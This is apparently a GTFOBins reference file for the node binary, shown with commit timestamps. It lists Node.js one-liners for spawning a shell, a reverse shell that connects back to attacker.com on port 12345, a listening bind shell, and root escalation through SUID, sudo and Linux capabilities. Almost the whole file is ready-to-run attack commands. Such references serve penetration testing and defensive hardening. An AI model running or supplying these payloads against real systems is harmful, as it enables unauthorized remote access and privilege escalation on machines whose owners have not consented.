GTFOBins.github.io/_gtfobins/node.md

37 lines
1.3 KiB
Markdown
Raw Normal View History

2018-05-23 18:47:50 +00:00
---
functions:
2018-05-25 13:30:02 +00:00
execute-interactive:
2018-07-16 13:01:50 +00:00
- code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-25 13:30:02 +00:00
reverse-shell-interactive:
2018-07-16 13:01:50 +00:00
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
});'
2018-05-25 13:30:02 +00:00
bind-shell-interactive:
2018-07-16 13:01:50 +00:00
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
2018-07-04 18:26:52 +00:00
suid-enabled:
2018-07-16 13:01:50 +00:00
- code: |
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
2018-07-04 18:26:52 +00:00
sudo-enabled:
2018-07-16 13:01:50 +00:00
- code: |
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-09-12 21:02:05 +00:00
capabilities-enabled:
- code: |
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-23 22:40:03 +00:00
---